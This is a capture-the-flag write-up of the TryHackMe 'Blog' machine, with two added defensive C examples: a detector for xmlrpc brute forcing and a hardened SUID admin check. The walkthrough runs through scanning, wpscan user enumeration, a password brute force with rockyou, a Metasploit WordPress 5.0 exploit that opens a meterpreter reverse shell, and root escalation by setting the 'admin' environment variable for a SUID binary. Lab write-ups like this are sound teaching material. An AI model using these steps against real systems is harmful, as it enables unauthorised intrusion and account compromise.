Tryhackme Blog Writeup

Hakan Altun
5 min read, Feb 28, 2021

Since the blog is hosted on AWS, you'll first need to add blog.thm to your /etc/hosts file so the name resolves. Then start with an nmap scan.

Command: nmap -vv -sCV blog.thm

PORT    STATE SERVICE     REASON  VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3hfvTN6e0P9PLtkjW4dy+6vpFSh1PwKRZrML7ArPzhx1yVxBP7kxeIt3lX/qJWpxyhlsQwoLx8KDYdpOZlX5Br1PskO6H66P+AwPMYwooSq24qC/Gxg4NX9MsH/lzoKnrgLDUaAqGS5ugLw6biXITEVbxrjBNdvrT1uFR9sq+Yuc1JbkF8dxMF51tiQF35g0Nqo+UhjmJJg73S/VI9oQtYzd2GnQC8uQxE8Vf4lZpo6ZkvTDQ7om3t/cvsnNCgwX28/TRcJ53unRPmos13iwIcuvtfKlrP5qIY75YvU4U9nmy3+tjqfB1e5CESMxKjKesH0IJTRhEjAyxjQ1HUINP
| 256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJtovk1nbfTPnc/1GUqCcdh8XLsFpDxKYJd96BdYGPjEEdZGPKXv5uHnseNe1SzvLZBoYz7KNpPVQ8uShudDnOI=
| 256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICfVpt7khg8YIghnTYjU1VgqdsCRVz7f1Mi4o4Z45df8
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-generator: WordPress 5.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel's IT Blog – The IT blog
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| BLOG<00> Flags: <unique><active>
| BLOG<03> Flags: <unique><active>
| BLOG<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 30652/tcp): CLEAN (Couldn't connect)
| Check 2 (port 21972/tcp): CLEAN (Couldn't connect)
| Check 3 (port 50006/udp): CLEAN (Failed to receive data)
| Check 4 (port 11143/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: blog
| NetBIOS computer name: BLOG\x00
| Domain name: \x00
| FQDN: blog
|_ System time: 2021-02-28T12:23:32+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-28T12:23:32
|_ start_date: N/A

Looking at the HTTP port, we see that WordPress is in use. Next, enumerate usernames with wpscan.

Command: wpscan --url blog.thm -e u

[i] User(s) Identified:
[+] kwheel
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] bjoel
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Karen Wheeler
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Rss Generator (Aggressive Detection)
[+] Billy Joel
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Rss Generator (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

As we saw, there are two different users. We can run a brute-force attack against these users.

Command: wpscan --url blog.thm -U kwheel -P /home/hakanbey/Desktop/rockyou.txt -t 75

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - kwheel / cu*******
Trying kwheel / disney Time: 00:00:08 < > (2865 / 14344919) 0.00% ETA: ??:??:??
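From the defender's side, the wpscan run above shows up as a burst of POST requests to /xmlrpc.php from one client. The following is an added example (not part of the original writeup and not wpscan's or WordPress's code) that tallies such requests per client IP from Apache combined-format access log lines and flags clients at or above a threshold. The log lines are constructed for the example, and the User-Agent values are deliberately bland, because the client chooses that header and detection should rest on behaviour instead.

```c
#include <stdio.h>
#include <string.h>

/* Constructed Apache combined-format access log lines (not captured from
 * the box). Five POSTs to xmlrpc.php from one client in a short window
 * model the burst a password attack produces; the other client is normal. */
static const char *const SAMPLE_LOG[] = {
    "10.10.14.5 - - [28/Feb/2021:12:24:01 +0000] \"POST /xmlrpc.php HTTP/1.1\" 200 413 \"-\" \"Mozilla/5.0\"",
    "10.10.14.9 - - [28/Feb/2021:12:24:01 +0000] \"GET /wp-login.php HTTP/1.1\" 200 2512 \"-\" \"Mozilla/5.0\"",
    "10.10.14.5 - - [28/Feb/2021:12:24:02 +0000] \"POST /xmlrpc.php HTTP/1.1\" 200 413 \"-\" \"Mozilla/5.0\"",
    "10.10.14.5 - - [28/Feb/2021:12:24:02 +0000] \"POST /xmlrpc.php HTTP/1.1\" 200 413 \"-\" \"Mozilla/5.0\"",
    "10.10.14.9 - - [28/Feb/2021:12:24:03 +0000] \"POST /xmlrpc.php HTTP/1.1\" 200 413 \"-\" \"Mozilla/5.0\"",
    "10.10.14.5 - - [28/Feb/2021:12:24:03 +0000] \"POST /xmlrpc.php HTTP/1.1\" 200 413 \"-\" \"Mozilla/5.0\"",
    "10.10.14.5 - - [28/Feb/2021:12:24:04 +0000] \"POST /xmlrpc.php HTTP/1.1\" 200 413 \"-\" \"Mozilla/5.0\"",
    "garbage line that does not parse",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

#define MAX_CLIENTS 64

struct client {
    char ip[64];
    int posts;   /* POST requests to /xmlrpc.php seen from this client */
};

/* Pull the client IP and the request method/path out of one combined-format
 * line. Returns 1 on success, 0 if the line does not look like a log entry.
 * The sscanf widths assume method and path buffers of 16 and 256 bytes. */
static int parse_line(const char *line, char *ip, size_t ipsz,
                      char *method, size_t msz, char *path, size_t psz)
{
    size_t iplen = strcspn(line, " ");
    if (iplen == 0 || iplen >= ipsz)
        return 0;
    memcpy(ip, line, iplen);
    ip[iplen] = '\0';

    const char *q = strchr(line, '"');   /* request line starts after the first quote */
    if (q == NULL || msz < 16 || psz < 256)
        return 0;
    if (sscanf(q + 1, "%15s %255s", method, path) != 2)
        return 0;
    return 1;
}

/* Tally POST /xmlrpc.php per client and copy every client at or above
 * threshold into out. Returns the number of flagged clients. */
int find_xmlrpc_bruteforcers(const char *const *lines, size_t n, int threshold,
                             struct client *out, int max_out)
{
    struct client tally[MAX_CLIENTS];
    int nt = 0;

    for (size_t i = 0; i < n; i++) {
        char ip[64], method[16], path[256];
        if (!parse_line(lines[i], ip, sizeof ip, method, sizeof method, path, sizeof path))
            continue;
        /* match on behaviour (method + path), never on the User-Agent header */
        if (strcmp(method, "POST") != 0 || strncmp(path, "/xmlrpc.php", 11) != 0)
            continue;

        int j;
        for (j = 0; j < nt; j++)
            if (strcmp(tally[j].ip, ip) == 0)
                break;
        if (j == nt) {
            if (nt == MAX_CLIENTS)
                continue;                /* table full: drop rather than overflow */
            strcpy(tally[nt].ip, ip);
            tally[nt].posts = 0;
            nt++;
        }
        tally[j].posts++;
    }

    int found = 0;
    for (int j = 0; j < nt && found < max_out; j++)
        if (tally[j].posts >= threshold)
            out[found++] = tally[j];
    return found;
}

int main(void)
{
    struct client flagged[MAX_CLIENTS];
    int n = find_xmlrpc_bruteforcers(SAMPLE_LOG, SAMPLE_LOG_LEN, 3, flagged, MAX_CLIENTS);
    for (int i = 0; i < n; i++)
        printf("ALERT %s: %d POSTs to /xmlrpc.php\n", flagged[i].ip, flagged[i].posts);
    return 0;
}
```

In production the same tally would be kept per sliding time window rather than over a whole file, and the response is the usual one: rate-limit or disable xmlrpc.php if the site does not need it, and require strong, unique passwords for every WordPress author account.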

Well done. Now we have the password and can log in from the WordPress login page.

As you can see, the WordPress version number appears in the marked area. Let's search for this version in Metasploit.

Command: search Wordpress 5.0

Command: use 0

After selecting the exploit, configure the options and run it.

Command: set PASSWORD cu*******

Command: set USERNAME kwheel

Command: set RHOSTS 10.10.100.204

Command: set LHOST tun0

Command: run

Command: shell

meterpreter > shell
Process 2053 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

If you ask me, at this point you should drop from meterpreter into a shell; I always do that and then spawn a pty with Python in the new shell.

www-data@blog:/var/www/wordpress$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@blog:/var/www/wordpress$

Now we'll look at SUID files to escalate privileges.

Command: find / -perm -4000 -type f 2>/dev/null

/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/traceroute6.iputils
/usr/sbin/checker
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping
/bin/su

Yeah, I think we found it: /usr/sbin/checker. We'll use this one.

Command: ltrace /usr/sbin/checker

getenv("admin")                                                                                          = nil
puts("Not an Admin"Not an Admin
) = 13
+++ exited (status 0) +++

The binary calls getenv("admin"): if it finds an environment variable named "admin" set, it launches a root bash shell.

Command: export admin=hakanbey

Command: cd /usr/sbin/

Command: ./checker

www-data@blog:/$ export admin=hakanbey
www-data@blog:/$ cd /usr/sbin/
www-data@blog:/usr/sbin$ ./checker
root@blog:/usr/sbin#
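The root cause here is a SUID program deciding who is an administrator from an environment variable, which the unprivileged caller fully controls. The following is an added example, not the original checker's source (its logic is only inferred from the ltrace output above) and not part of the writeup: the flawed decision next to a hardened one that relies solely on the kernel-supplied real uid and supplementary groups. The admin group id 27 is an assumption (the "sudo" group on Ubuntu), and the setenv call in main simply reproduces what the caller did in the writeup.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Flawed decision, modelled on what ltrace showed for /usr/sbin/checker:
 * the program asks getenv("admin") and treats any non-NULL answer as proof
 * of administrator rights. For a SUID program the environment is supplied
 * by the unprivileged caller, so this is attacker-controlled input. */
int flawed_is_admin(const char *admin_env)
{
    return admin_env != NULL;
}

/* Hardened decision: consult only identity the kernel vouches for. The
 * real uid (the user who invoked the program, regardless of the SUID bit)
 * must be root, or the caller's supplementary groups must include
 * admin_gid. Nothing from the environment takes part. */
int hardened_is_admin(uid_t real_uid, const gid_t *groups, size_t ngroups, gid_t admin_gid)
{
    if (real_uid == 0)
        return 1;
    for (size_t i = 0; i < ngroups; i++)
        if (groups[i] == admin_gid)
            return 1;
    return 0;
}

int main(void)
{
    /* Constructed: reproduce the caller's move from the writeup. */
    setenv("admin", "hakanbey", 1);

    gid_t groups[64];
    int n = getgroups(64, groups);
    if (n < 0)
        n = 0;
    gid_t admin_gid = 27;   /* assumption: gid of the "sudo" group on Ubuntu */

    printf("flawed check   : %s\n",
           flawed_is_admin(getenv("admin")) ? "admin" : "Not an Admin");
    printf("hardened check : %s\n",
           hardened_is_admin(getuid(), groups, (size_t)n, admin_gid) ? "admin" : "Not an Admin");

    /* Even for an authorised caller, a SUID helper should run one fixed
     * command with a scrubbed environment (clearenv() followed by execve()
     * with a known-good envp) rather than an interactive shell that inherits
     * the caller's environment. */
    return 0;
}
```

Run as www-data with admin exported, the flawed check prints "admin" while the hardened check prints "Not an Admin"; only a real root or sudo-group caller passes the hardened check. Auditing the SUID list from the find command above for custom binaries such as checker, and reviewing them for getenv-based trust, is the corresponding detection step.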

Bingo. We are now root. We can start collecting the flags.

Command: cd /root/ && cat root.txt

9a0b2b61***************53d9f318

Finally, let's use the find command to locate the user.txt file.

Command: find / -name 'user.txt' 2>/dev/null

root@blog:/root# find / -name 'user.txt' 2>/dev/null
/home/bjoel/user.txt
/media/usb/user.txt
root@blog:/root#

Command: cat /media/usb/user.txt

c8421899a*************92b71a8ab7

Thank you for reading and solving along.
